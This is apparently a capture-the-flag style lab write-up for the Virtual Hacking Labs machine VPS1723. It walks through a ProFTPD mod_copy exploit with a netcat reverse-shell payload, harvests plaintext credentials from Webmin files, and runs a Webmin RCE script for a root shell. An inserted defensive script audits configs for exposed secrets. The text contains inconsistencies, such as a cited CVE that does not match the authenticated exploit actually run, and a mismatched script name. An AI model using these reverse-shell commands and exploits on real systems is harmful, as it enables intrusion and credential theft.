# VHL — VPS1723

Webmin 1.991 on Ubuntu. CVE-2019-15107 arbitrary command execution via the password reset endpoint for instant root access.

February 10, 2025 · Virtual Hacking Labs · Web / Easy / Linux

#Webmin #CVE-2019-15107 #RCE #ProFTPD

## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 21:40 EST
Nmap scan report for 10.11.1.53
Host is up (0.021s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        ProFTPD 1.3.5
22/tcp    open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ec:4e:15:c3:91:e6:76:0d:b0:79:d7:e0:c7:8c:a6:d0 (RSA)
|   256 3a:27:36:f6:da:22:eb:bf:ce:e3:97:4c:9c:01:d9:eb (ECDSA)
|_  256 c4:97:f5:f2:cf:99:d0:6a:9d:9f:2c:dc:c3:dc:1c:f8 (ED25519)
80/tcp    open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
81/tcp    open  tcpwrapped
10000/tcp open  http       MiniServ 1.991 (Webmin httpd)
|_http-title: Login to Webmin
|_http-server-header: MiniServ/1.991
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 1 disallowed entry 
|_/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=21%CT=1%CU=39143%PV=Y%DS=2%DC=I%G=Y%TM=67AA
OS:B8EF%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10E%TI=Z%II=I%TS=A)SEQ(S
OS:P=FF%GCD=1%ISR=10E%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M
OS:5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE8
OS:8%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   20.60 ms 10.11.1.53

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds
```

## Port 21 (FTP)

```sh
21/tcp    open  ftp        ProFTPD 1.3.5
```

```sh
ftp anonymou@10.11.1.53 
Connected to 10.11.1.53.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.11.1.53]
331 Password required for anonymou
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ext
?Invalid command.
```

49908.py (the Exploit-DB ProFTPD 1.3.5 mod_copy script) writes a PHP file into the web root:

```sh
python3 49908.py 10.11.1.53
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.11.1.53]

350 File or directory exists, ready for destination name

550 cpto: Permission denied

350 File or directory exists, ready for destination name

250 Copy successful

Exploit Completed
[+] File Written Successfully
[+] Go to : http://10.11.1.53/test.php
```

## shell as www-data

```sh
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set CMD 'busybox nc 172.16.1.1 1234 -e bash'
CMD => busybox nc 172.16.1.1 1234 -e bash
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
```
```sh
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.11.1.53       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www/html    yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/generic):

   Name  Current Setting                     Required  Description
   ----  ---------------                     --------  -----------
   CMD   busybox nc 172.16.1.1 1234 -e bash  yes       The command string to execute
```
```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.53] 37064
whoami
www-data
```

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
```sh
www-data@vps1723:/opt/webmin/mysql$ cat config
cat config
start_cmd=cd /usr/local/mysql ; (./bin/safe_mysqld || ./bin/mysqld_safe) &
perpage=25
mysql=/usr/local/mysql/bin/mysql
mysqldump=/usr/local/mysql/bin/mysqldump
mysqlimport=/usr/local/mysql/bin/mysqlimport
pass=foo
mysqlshow=/usr/local/mysql/bin/mysqlshow
login=root
mysql_libs=/usr/local/mysql/lib
mysqladmin=/usr/local/mysql/bin/mysqladmin
style=1
add_mode=1
nodbi=0
access=*: *
blob_mode=0
date_subs=0
passwd_mode=0
mysql_data=/usr/local/mysql/var
max_dbs=50
my_cnf=/etc/my.cnf
max_text=1000
nopwd=0
webmin_subs=0
```
```sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  gcc                                   4:9.3.0-1ubuntu2                      amd64        GNU C compiler
ii  gcc-9                                 9.4.0-1ubuntu1~20.04.1                amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ MySQL version
mysql  Ver 8.0.29-0ubuntu0.20.04.3 for Linux on x86_64 ((Ubuntu))
```

```sh
./bin/passwd:211: - passwd root
./bin/passwd:213: - passwd --user root
./bin/passwd:215: - passwd --user root --password ycwyMQRVAZY
./bin/passwd:217: - passwd --config /usr/local/etc/webmin --user root --password ycwyMQRVAZY
```

```sh
www-data@vps1723:/opt/webmin$ grep -rn ./ -ie "password" 

./mailboxes/boxes-lib.pl:948:	# Get username and password from parameters, or from module config
./setup.bat:27:SET password=admin
./demo.txt:2:password: x8rqsPHQ6X98A
```

```sh
www-data@vps1723:/opt/webmin$ cat demo.txt
cat demo.txt
username: demouser
password: x8rqsPHQ6X98A
```

## creds

```
demouser:x8rqsPHQ6X98A
```
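The privilege escalation here hinges on plaintext credentials that www-data could read under /opt/webmin (`pass=foo` / `login=root` in the mysql module config, and `demo.txt`). As an added defensive example (not part of this writeup or of Webmin), the script below parses Webmin-style `key=value` module configs and loose `key: value` notes, reports every file holding a non-empty secret key together with the account name beside it, and flags whether the file mode lets any local user read it. The sample tree it builds is constructed to mirror what was found on the box.

```python
"""Audit a Webmin install for plaintext credentials in readable config files.
Added example, not from the writeup or Webmin; the sample tree is constructed."""
import os, re, stat, tempfile
from pathlib import Path

# Webmin module configs are "key=value" per line; demo.txt on the box used "key: value".
KV_LINE = re.compile(r"^\s*([A-Za-z_][\w-]*)\s*[=:]\s*(.*?)\s*$")
SECRET_KEY = re.compile(r"^(pass|passwd|password|pw|secret|token)$", re.I)
ACCOUNT_KEY = re.compile(r"^(login|user|username)$", re.I)

def parse_kv(text):
    """Parse key=value / key: value lines, skipping blanks and '#' comments."""
    pairs = {}
    for line in text.splitlines():
        m = KV_LINE.match(line)
        if m and not line.lstrip().startswith("#"):
            pairs[m.group(1)] = m.group(2)
    return pairs

def audit_file(path):
    """Return a finding when the file stores a non-empty secret, else None."""
    pairs = parse_kv(Path(path).read_text(errors="replace"))
    secrets = sorted(k for k, v in pairs.items() if SECRET_KEY.match(k) and v)
    if not secrets:
        return None
    account = next((v for k, v in pairs.items() if ACCOUNT_KEY.match(k)), None)
    mode = os.stat(path).st_mode
    return {"path": str(path), "secret_keys": secrets, "account": account,
            # True when 'other' may read it: the condition that let www-data harvest creds
            "world_readable": bool(mode & stat.S_IROTH)}

def audit_tree(root):
    """Walk the install; check module 'config' files and stray *.txt notes."""
    return [f for p in sorted(Path(root).rglob("*"))
            if p.is_file() and (p.name == "config" or p.suffix == ".txt")
            for f in [audit_file(p)] if f]

def build_sample_tree():
    """Constructed mirror of the writeup's /opt/webmin findings (hypothetical paths)."""
    root = Path(tempfile.mkdtemp())
    (root / "mysql").mkdir()
    (root / "mysql" / "config").write_text("login=root\npass=foo\nnopwd=0\nmy_cnf=/etc/my.cnf\n")
    (root / "demo.txt").write_text("username: demouser\npassword: x8rqsPHQ6X98A\n")
    (root / "proc").mkdir()
    (root / "proc" / "config").write_text("pass=\nstyle=1\n")  # empty secret: no finding
    os.chmod(root / "mysql" / "config", 0o644)  # readable by any local user
    os.chmod(root / "demo.txt", 0o600)          # owner-only
    return root

if __name__ == "__main__":
    for finding in audit_tree(build_sample_tree()):
        print(finding)
```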

## Port 80 (HTTP)

```sh
80/tcp    open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
```

## Port 10000 (Webmin)

```sh
10000/tcp open  http       MiniServ 1.991 (Webmin httpd)
|_http-title: Login to Webmin
|_http-server-header: MiniServ/1.991
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 1 disallowed entry 
|_/
```

## webmin

Log in with the credentials found: demouser:x8rqsPHQ6X98A

## Webmin version 1.991 RCE

- https://github.com/esp0xdeadbeef/rce_webmin

```sh
wget https://raw.githubusercontent.com/esp0xdeadbeef/rce_webmin/refs/heads/main/exploit.py
```

```sh
python3 webmin_rce.py -u http://10.11.1.53:10000 -pw x8rqsPHQ6X98A -un demouser -rh 172.16.1.1 -rp 1235
```

```sh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.53] 58208
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/key.txt
djk43nls93mwz17dfvba
# date
Tue Feb 11 03:57:15 UTC 202
```